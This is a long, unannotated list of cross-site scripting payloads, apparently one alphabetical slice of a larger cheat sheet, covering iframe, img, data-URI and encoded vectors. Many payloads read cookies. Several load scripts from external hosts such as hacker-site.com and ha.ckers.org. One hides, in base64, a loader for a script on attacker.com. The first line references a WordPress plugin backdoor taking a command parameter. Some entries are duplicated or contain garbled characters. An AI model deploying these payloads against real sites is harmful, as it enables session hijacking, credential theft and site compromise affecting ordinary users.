- http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
- @brutelogic.com.br/webgun/test.php?p=”>http://javascript:alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+onload=location=URL.slice(7,26)>
- <http://onxxx%3D1/
- <http://onxxx%3D151/
- http://...?p=<script/src=//brutelogic.com.br/1+
- http://...?p=<svg/onload=alert(1)+
- http(s)://host/page?p=XSS
- http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)
- http://target.com/something.xxx?a=val1&a=val2
- http://window.open (“http://tpc.googlesyndication.com/safeframe/1-0- K”,”1;25;<svg/onload=alert(/XSS/)>true”)
- http://www.google<script .com>alert(document.location)</script
- http://www.google<script .com>confirm(document.location)</script
- http://www.<script abc>setTimeout(‘confirm(1)’,1)</script .com>
- http://www.<script>alert(1)</script .com
- http://www.<script>confirm(1)</script .com
- http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
- http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
- http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=><img src=x onerror=prompt(0);>
- http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=v><img src=x onerror=prompt(0);>
- http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS
- HYPERLINK TAG INJECTION:
- (i=0;i<100;)
- @i\6d\70o\72\74'javascr\ipt:alert(document.cookie)’;
- i = document.createElement(input);
- id=XSS SRC=<IMG 6;avascript:alert(‘XSS’)>
- id=xss style=overflow:scroll>
- if(1)confirm(1)}{
- if(/*@cc_on!@*/0==1){alert(1);}else{alert(2);}</script>
- <;! — [if gte IE 4]>;
- <! — [if gte IE 4]>
- <! — [if gte IE 4]><SCRIPT>alert(‘XSS’);</SCRIPT><![endif] →
- <! — [if gte IE 4]> <SCRIPT>alert(‘XSS’);</SCRIPT> <![endif] →
- <! — [if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif] →
- <! — [if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif] →
- <! — [if IE]><img src=# width=0 height=0 onerror=alert(/insight-labs/)><![endif] →
- <! — [if IE]><img src=# width=0 height=0 onerror=alert(/ourren_demo/)><![endif] →
- <![if<iframe
- <![if<iframe/onload=alert(1)//]>
- <![if<iframe/onload=vbs::alert[:]>
- <! — [if<img src=x onerror=alert(2)//]> →
- <! — [if<img src=x onerror=javascript:alert(1)//]> →
- <! — [if<img src=x:x onerror=confirm(5)//] →
- <ifra<ifame>me>…</ifra</iframe>me>
- <iframe/%00/ src=javaSCRIPT:alert(1)
- <iframe/%00/ src=javaSCRIPT:confirm(1)
- <iframe %00 src=”	javascript:prompt(1)	”%00>
- <iframe%0Aname=”javascript:\u0061\u006C\u0065\u0072\u0074(1)”
- <iframe%0Aname=”javascript:\u0061\u006C\u0065\u0072\u0074(1)” %0Aonload=”eval(name)”;>
- “><iframe%20src=”http://google.com"%%203E
- <IFRAME%20src=’javascript:confirm%26%23x25;281)’>
- iframe.contentWindow.location.constructor.prototype
- </iframe><form method=post action=LOGIN_URL>
- <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById(‘ifra’); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, ‘Safe’, {value:{}}); foo(Safe, ‘get’, {value:function() { return document.cookie }}); alert(Safe.get());</script>
- <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById(‘ifra’); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, ‘Safe’, {value:{}}); foo(Safe, ‘get’, {value:function() { return document.cookie }}); alert(Safe.get());</script>
- <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById(‘ifra’); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, ‘Safe’, {value:{}}); foo(Safe, ‘get’, {value:function() { return document.cookie }}); confirm(Safe.get());</script>
- <iframe id=t:alert(1) name=javascrip onload=location=name%2bid>
- <iframe id=XSS / /onload=alert(/XSS/)></iframe>
- <iframe id=XSS / “onload=alert(/XSS/)></iframe>
- <iframe id=XSS “onload=alert(/XSS/)></iframe>
- <iframe id=XSS///////onload=alert(/XSS/)></iframe>
- <iframe id=XSS <?php echo chr(11)?> onload=alert(/XSS/)></iframe>
- <iframe id=XSS <?php echo chr(12)?> onload=alert(/XSS/)></iframe>
- <IFRAME id=XSS SRC=”javascript:alert(‘XSS’); <
- <IFRAME id=XSS SRC=”javascript:alert(‘XSS’);”></IFRAME>
- <iframe><iframe src=javascript:alert(/@jackmasa/)></iframe>
- <iframe><iframe src=javascript:confirm(4)></iframe>
- <IFRAME name=”F1" src=”http://target/#<SCRIPT>var secret=’1232';”></IFRAME>
- <IFRAME name=”F2" src=”http://target/#<SCRIPT>var secret=’1233';”></IFRAME>
- <IFRAME name=”F3" src=”http://target/#<SCRIPT>var secret=’1234';”></IFRAME>
- <iframe/name=”if(0){\u0061lert(1)}else{\u0061lert(1)}”/onload=”eval(name)”;>
- <iframe name=javascript:alert(1) src=http://www.target.com/?xss=<svg/onload=location=name//>
- <iframe/name=”javascript:confirm(1);”onload=”while(1){eval(name);}”>
- <iframe ng-src=javascript:..>
- <iframe onbeforeload iframe onbeforeload=”javascript:javascript:alert(1)”></iframe onbeforeload>
- <iframe onload=%22write(‘<script>’%2Blocation.hash.substr(1)%2B’</script>’)%22></iframe>#var xhr = new XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- <iframe onload=%22write(‘<script>’%2Blocation.hash.substr(1)%2B’</script>’)%22></iframe>#var xhr = new XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- “><iframe/onload=alert(1)>
- <iframe onload=”alert(1)”></iframe>
- <iframe/onload=alert(document.domain)></iframe>
- <iframe/onload=alert(/INJECTX/)>
- <iframe onload iframe onload=”javascript:javascript:alert(1)”></iframe onload>
- <iframe onLoad iframe onLoad=”javascript:javascript:alert(1)”></iframe onLoad>
- <iframe onload=popup=1;>
- <iframe/onload=’this[“src”]=”javas	cript:al”+”ert``”’;>
- <iframe/onload=’this[“src”]=”javas	cript:al”+”ert``”’;
- <iframe/onreadystatechange=alert(1)
- <iframe/onreadystatechange=confirm(1)
- “><iframe/onreadystatechange=confirm(1)
- <iframe onReadyStateChange iframe onReadyStateChange=”javascript:javascript:alert(1)”></iframe onReadyStateChange>
- <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074(‘\u0061’) worksinIE>
- <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074(‘\u006worksinIE>
- <iframe<?php echo chr(11)?> onload=alert(‘XSS’)></iframe>
- <iframe<?php echo chr(11)?> onload=alert(‘XSS’)></iframe>
- “></iframe><script>alert(123)</script>
- “></iframe><script>alert(123)</script>
- “></iframe><script>alert(document.cookie);</script>
- “></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder=”0%EF%BB%BF
- <iframesrc='http://www.target.com?foo="xss autofocus/AAAAA
- <iframesrc='http://www.target.com?foo="xss autofocus/AAAAA onfocus=location=window.name//'
- <iframe/src=%2f⾾n.mario#%0Anew%20alert%20`3`;width=1 height=1 style=visibility:hidden;/>
- <iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
- <iframe src=Javascript:alert(53)>
- <iframe/src=about:blank onload=alert(1)>
- <iframe src=”//brutelogic.com.br/tests/status.html” onload=”frames[0].postMessage(‘<script>alert(document.domain)’,’*’)”>
- <iframe src=”data:D,<script>confirm(top.document.body.innerHTML)</script>”>
- <iframe src=”data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
- <iframe src=”data:message/rfc822,Content-Type: text/html;%0aContent-Transfer-Encoding: quoted-printable%0a%0a=3CSCRIPT=3Econfirm(document.location)=3C/SCRIPT=3E”></iframe>
- <iframe src=\”data:),<script>alert(document.domain)</script>”></iframe>
- <iframe/src=”data:text/html,
- <iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>
- <iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>
- <IFRAME/SRC=DATA:TEXT/HTML;BASE64,ICA8U0NSSVBUIC8NU1JDPSINSFRUUFM6DS8NDS8NSEVJREVSSS5DSC96DSINID4NPC9TQ1JJUFQNDT5>
- <iframe src=”data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=”/>
- <iframe src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></iframe> (Firefox, Chrome, Safari)
- <iframe src=”data:text/html,<script>alert(1)</script>”></iframe>
- <iframe/src=”data:text/html&p=<svg/onload=alert(49)>”>
- <iframe src=”data:text/html,<script>alert(0)</script>”></iframe> (Firefox, Chrome, Safari)
- <iframe/src=”data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload =confirm(1);>”;>
- <iframe src=”data:text/html,<svg onload=alert(1)>”>
- <iframe/src=”data:text/html,<svg onload=alert(1)>”>
- <iframe/src=”data:text/html,<svg onload=confirm(1)>”>
- <iframe/src=”data:text/html,<svg onload=alert(1)>”>
- <iframe/src=”data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”>
- <iframe/src=”data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”>
- <Iframe / src = “data: text & sol; html; & Tab; base64 & NewLine;, PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg ==”>
- <iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
- <iframe srcdoc=’<body onload=prompt(1)>’>
- <iframe srcdoc=”<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>”>
- <iframe srcdoc=\”<iframe srcdoc=’&lt;iframe onload=alert(1)&gt;’>\”></iframe>
- “><iframe srcdoc=”<img src=x:x onerror=alert(1)>”>
- <iframe srcdoc=”<script>alert(1)</script>”></iframe>
- <iframe srcdoc=’<svg/onload=alert(1)>’>
- <iframe srcdoc=’<svg/onload=alert(/@80vul/)>’>
- <iframe srcdoc=’<svg/onload=confirm(3)>’>
- <iframe srcdoc=<svg/onload=alert(1)>>
- <iframe srcdoc=”<svg onload=alert(1)>⃒”></iframe>
- <iframe srcdoc=”<svg/onload=confirm(domain)>”>
- <iframe srcdoc=<svg/onload=alert(173)>>
- <iframe srcdoc=<svg/onload=alert(1)>>
- <iframe srcdoc=<svg/onload=alert(1)>>
- <iframe src=”http://0x.lv/xss.swf"></iframe>
- <IFRAME SRC=��http://hacker-site.com/xss.html��>
- <IFRAME SRC=http://hacker-site.com/xss.html>
- <iframe src=http://ha.ckers.org/scriptlet.html <
- <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
- <IFRAME SRC=http://ha.ckers.org/scriptlet.html <
- <iframe src=”http://localhost"></iframe>
- <iframe src=”http://target.com/something.jsp?inject=<script>eval(name)</script>" name=”alert(1)”></iframe>
- <iframe/src=”http://www.b.com/1.swf?get-data=(function(){alert(document.cookie)})()"></iframe>
- <iframe/src=”http://www.b.com/1.swf?get-data=(function(){location.href=%22javascript:'<script>alert(document.cookie)</script>'%22})()"></iframe>
- “> “><iframe src=http://xss.cx onload=confirm(5) <<iframe src=a> “><iframe src=http://xss.cx onload=confirm(8) <
- <iframe src=”http://xss.cx?x=<iframe name=x></iframe>”></iframe><a href=”http://xss.ms" target=x id=x></a><script>window.onload=function(){x.click()}</script>
- <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open(‘GET’,’http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
- <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open(‘GET’,’http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
- <iframe src=http://xss.rocks/scriptlet.html <
- /*iframe/src*/<iframe/src=”<iframe/src=@”/onload=prompt(1) /*iframe/src*/>
- /*iframe/src*/<iframe/src=”<iframe/src=@”/onload=prompt/*iframe/src*/>
- <iframe src iframe src=”javascript:javascript:alert(1)”></iframe src>
- <iframe src=”jar://html5sec.org/test.jar!/test.html”></iframe>
- <iframe src=”jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”></iframe>
- <iframe src=”javascript:%61%6c%65%72%74%28%31%29"></iframe>
- <IFRAME/SRC=JAVASCRIPT:%61%6c%65%72%74%28%31%29></iframe>
- <IFRAME/SRC=JAVASCRIPT:%61%6c%65%72%74%28%31%29></iframe> // Cross Browser (PEPE Vila)
- <iframe src=javascript:alert(1)>
- <iframe src=javascript:alert(1)>
- <iframe src=javascript:alert(161)>
- <iframe src=”java script:alert(1)” height=0 width=0 /><iframe> <! —
- <iframe src=”java script:alert(1)” height=0 width=0 /><iframe>
- <iframe src=”javascript:al ert(1)” height=0 width=0 /><iframe> <! —
- <iframe src=”javascript:al ert(1)” height=0 width=0 /><iframe>
- → <iframe src=java script:alert(1); height=0 width=0 /><iframe>
- <iframe src=”java script:alert(1)” height=0 width=0 /><iframe> <! — Java
- <iframe src=”javascript:alert(1)”></iframe>
- <iframesrc=”javascript:alert(2)”>
- <IFRAME SRC=”javascript:alert(29);”></IFRAME>
- <iframe src=”javascript:alert(69)%%0D3C! —
- <iframe src=”javascript:alert(71)%%0D3C! —
- “><iframe src=javascript:alert(document.cookie); height=0 width=0 /> <iframe>
- <IFR AME src=javascript:alert(‘XSnS’)></IFRA ME>
- “><iframe src=”javascript:alert(XSS)”>
- ><iFrAmE/src=jAvAscrIpT:alert(/Xss/)>
- ��><iFrAmE/src=jAvAscrIpT:alert(/Xss/)>
- ><iFrAmE/src=jAvAscrIpT:alert(/Xss-By-Muhaddi/)>
- <iframe src=”javascript:alert(‘XSS by \nxss’);”></iframe><marquee><h1>XSS by xss</h1></marquee>
- ><iFrAmE/src=jAvAscrIpT:alert(/xss-by-shawar/)>
- <;IFRAME SRC=”;javascript:alert(‘;XSS’;);”;>;<;/IFRAME>;
- <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- <IFRAME SRC=”javascript:alert(XSS);”></IFRAME>
- <iframe// src=javaSCRIPT:alert(1)
- <iframe src=javascript:alert(document.location)>
- <iframe src=javascript:confirm(document.location)>
- <IFRAME SRC=”javascript:confirm(5);”></IFRAME>
- “><iframe/src=javascript:co\u006efir\u006d%28 1%29>
- <iframe src=”javascript:document.vulnerable=true; <
- <IFRAME SRC=”javascript:document.vulnerable=true;”></iframe>
- <iframe/src=’javascript:if(null==null){javascript:0?1:confirm(1);}’>
- <IFRAME SRC=”javascript:javascript:alert(1);”></IFRAME>
- “><iframe/src=javascript:prompt(1)>
- <iframe src=”javascript:’<script src=http://xss.cx ></script>’”></iframe>
- <iframe src=”javascript:’<script src=//pkav></script>’”>
- <iframe src=”javascript:’<script src=>;</script>’”></iframe>
- <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
- <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
- <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>
- <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
- <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
- <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
- <iframe/src=j	av	as	cri	pt	:co	nfir	m	(		1	)>
- <iframe src=//localhost/self/logout.php
- <iframe src=LOGOUT_URL onload=forms[0].submit()>
- <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
- <iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
- “><iframe src=’’ onload=alert(‘atul’)>
- <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
- <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Bconfirm%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
- <iframe/src \/\/onload = prompt(1)
- “><iframe/src \/\/onload = prompt(1)
- <IFRAME SRC=# onmouseover=”alert(document.cookie)”></IFRAME>
- <iframe src=”” onmouseover=”confirm(document.cookie)”>
- <iframe src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
- <iframe src=?p=%26lt;svg/o%256Eload%26equals;alert(1)%26gt;>
- <iframe src=%(scriptlet)s <
- <iframe src=””srcdoc=”data:,<svg/onload=alert(191)>”191=” sandbox>
- <iframe src=””/srcdoc=’<svg onload=alert(1)>’>
- <iframe src=”#” style=width:exp/**/ressi/**/on(confirm(1))>
- <iframe src=”	javascript:prompt(1)	”>
- <iframe src=”	javascript:prompt(1)	”>
- <iframe src=’//target.com/vulnpage.php?a=%1B$*H%1BN&b=%20type=image%20src=x%20onerror=alert(document.characterSet);//’>
- <iframe src=//targetsite.com?xss=<div/style=”width:expression(confirm(1))”>X</div>
- <iframe src=//targetsite?xss=<svg/onload%00=%00locatio%00n=nam%00e
- ><iframe src=/tests/cors/%23/tests/auditor.php?q1=<img/src=x onerror=alert(1)
- “><iframe src=”/tests/cors/%23/tests/auditor.php?q1=<img/src=x onerror=alert(1)”
- <iframe src=”vbscript:document.vulnerable=true;”>
- <iframe src=”vbscript:msgbox(1)”></iframe>
- <iframe src=”vbscript:msgbox(1)”></iframe> (IE)
- <iframe src=”\x01javascript:alert(0)”></iframe> <! — Example for Chrome →
- <iframe src=”javascript:alert(1)”></iframe>
- <iframe src=”x-javascript:alert(document.domain);”></iframe>
- <iframe src=x onerror=prompt(1)>
- <iframe style=display:none name=x></iframe>
- <iframe style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”>
- “><iframe style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”>
- <iframe style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”>
- <iframe width=0 height=0 src=”javascript:confirm(1)”>
- <IFRAME width=”420" height=”315" frameborder=”0" onload=”alert(document.cookie)”></IFRAME>
- <iframe xmlns=”#” src=”javascript:alert(1)”></iframe>
- <! — [if]><script>alert(1)</script →
- <! — [if]><script>alert(1)</script →
- <! — [if]><script>alert(1)</script → <! — [if<img src=x onerror=alert(1)//]> →
- <! — [if]><script>alert(1)</script → // Works up to IE9; see http://html5sec.org/#115
- <! — [if]><script>confirm(1)</script →
- <! — [if]><script>javascript:alert(1)</script →
- <! — [if WindowsEdition]><script>confirm(location);</script><![endif] →
- <image img=javascript:alert(XSS@%2Bdocument.domain caption= />
- <image src=1 href=1 onerror=”javascript:alert(1)”></image>
- <image src=”https://github.com/dummy.jpa href=1 onerror=”javascript:alert(document.cookie)”></image>
- <image src=”javascript:alert(1)”>
- <image src=”javascript:alert(2)”> // IE6, O10.10, OM10.0
- <image xlink:href=”data:image/svg+xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”/>
- <IMG />”>
- <IMG />
- <img/	  src=`~` onerror=prompt(1)>
- <img%09onerror=alert(1) src=a>
- <IMG%0aSRC%0a=%0a”%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a’%0aX%0aS%0aS%0a’%0a)%0a”%0a>
- <IMG%20DYNSRC=”javascript:alert(‘WXSS’)”>
- <IMG%20LOWSRC=”javascript:alert(‘WXSS’)”>
- <IMG%20"””><SCRIPT>alert(“WXSS”)</SCRIPT>”>
- <IMG%20SRC=javascript:alert('XSS')>
- <IMG%20SRC=javascript:alert('XSS')>
- <IMG%20SRC=”%20%20javascript:alert(‘WXSS’);”>
- <IMG%20SRC=’%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)’>
- =<img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert%26%23x28;1%26%23x29;>
- >”’><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
- >”’><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;confirm(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
- <IMG%20SRC=’javasc ript:alert(document.cookie)’>
- <IMG%20SRC=’javascript:alert(document.cookie)’>
- <IMG%20SRC=javascript:alert("WXSS")>
- <IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG%20SRC=`javascript:alert(“‘WXSS’”)`>
- <IMG%20SRC=”jav ascript:alert(‘WXSS’);”>
- <IMG%20SRC=”javascript:alert(‘WXSS’);”>
- <IMG%20SRC=”javascript:alert(‘WXSS’)”
- <IMG%20SRC=javascript:alert(‘WXSS’)>
- <IMG%20SRC=JaVaScRiPt:alert(‘WXSS’)>
- <IMG%20SRC=”jav	ascript:alert(‘WXSS’);”>
- <IMG%20SRC=”jav
ascript:alert(‘WXSS’);”>
- <IMG%20SRC=”jav
ascript:alert(‘WXSS’);”>
- <img%20src=x%20onerror=alert(1)>
- <IMG%20SRC=javascript:alert('XSS')>
- <img=”=”%20title=’”><img src=”=”onerror=alert(1)>”>’
- <img[a][b][c]src[d]=x[e]onerror=[f]”alert(1)”>
- <img/alt=1 onerror=eval(src) src=x:alert(alt) >
- <![><IMG ALT=”]><SCRIPT>confirm(1)</SCRIPT>”>
- <IMG ALT=”><SCRIPT>confirm(1)</SCRIPT>”(EOF)
- <img border=3 alt=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e>
- <IMG DYN id=XSS SRC=”javascript:alert(‘XSS’)”>
- <IMG DYNid=XSS SRC=”javascript:alert(‘XSS’)”>
- <IMG+DYNSRC=”javascript:alert(1);”>
- <IMG DYNSRC=”javascript:alert(‘XhSS’)”>
- <;IMG DYNSRC=”;javascript:alert(‘;XSS’;);”;>;
- <IMG DYNSRC=”javascript:alert(‘XSS’);”>
- <IMG DYNSRC=”javascript:alert(‘XSS’)”>
- <IMG DYNSRC=”javascript:alert(XSS)”>
- <IMG DYNSRC=\”javascript:alert(‘XSS’)\”>
- <IMG DYNSRC=”javascript:confirm(document.location)”>
- <img dynsrc=”javascript:document.vulnerable=true;”>
- <img DYNSRC=”javascript:document.vulnerable=true;”>
- <IMG DYNSRC=”javascript:javascript:alert(1)”>
- <IMG DYNSRC_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
- <img/id=”alert('XSS')\”/alt=\”/\”src=\”/\”onerror=eval(id)>
- <img id=��><��class=��><��src=��>��onerror=alert(9)>
- <img/id=”confirm(1)”/alt=”/”src=”/”onerror=eval(id)>’”>
- <IMG id=XSS SRC=”&14;javascript:alert(‘XSS’);”>
- <IMG id=XSS SRC=&{alert(‘XSS’);};>
- <img id=XSS SRC=”blah>”onmouseover=”alert(‘XSS’);”>
- <img id=XSS SRC=”blah”onmouseover=”alert(‘XSS’);”>
- <IMG id=XSS SRC=”jav
- <IMG id=XSS SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
- <IMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG id=XSS SRC=`javascript:alert(“‘XSS’”)`>
- <IMG id=XSS SRC=’javascript:alert(‘XSS’)
- <IMG id=XSS SRC=” javascript:alert(‘XSS’);”>
- <IMG id=XSS SRC=”jav ascript:alert(‘XSS’);”>
- <IMG id=XSS SRC=”jav ascript:alert(‘XSS’);”>
- <IMG id=XSS SRC=”javascript:alert(‘XSS’);”>
- <IMG id=XSS SRC=”javascript:alert(‘XSS’)”
- <IMG id=XSS SRC=javascript:alert(‘XSS’)>
- <IMG id=XSS SRC=javascript:alert(“XSS”)>
- <IMG id=XSS SRC=JaVaScRiPt:alert(‘XSS’)>
- <IMG id=XSS SRC=”livescript:[code]”>
- <IMG id=XSS SRC=”mocha:[code]”>
- <IMG id=XSS SRC=’vbscript:msgbox(“XSS”)’>
- ><img id=XSS SRC=x onerror=alert(XSS);>
- <IMG id=XSS STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”>
- <img+<iframe =”1" onerror=”alert(1)”>
- <img language=vbscript src=<b onerror=”alert 1">
- <img language=vbscript src=<b onerror=”alert 1"> // IE 8
- <img language=vbs src=<b onerror=alert#1/1#>
- <img language=vbs src=<b onerror=confirm#1/1#>
- <img longdesc=”src=” images=”” stop.png”=”” onerror=”alert(document.domain);//"” src=”x” alt=”showme”>
- <<img longdesc=”src=’x’onerror=alert(document.domain);//><img “ src=’showme’>
- <img longdesc=”src=’x’onerror=eval(window.atob(‘aW5jbHVkZT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtpbmNsdWRlLnNyYz0naHR0cHM6Ly9hdHRhY2tlci5jb20vYXRtYWlsLmpzJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGluY2x1ZGUpOw==’));//><img “ src=’showme’>
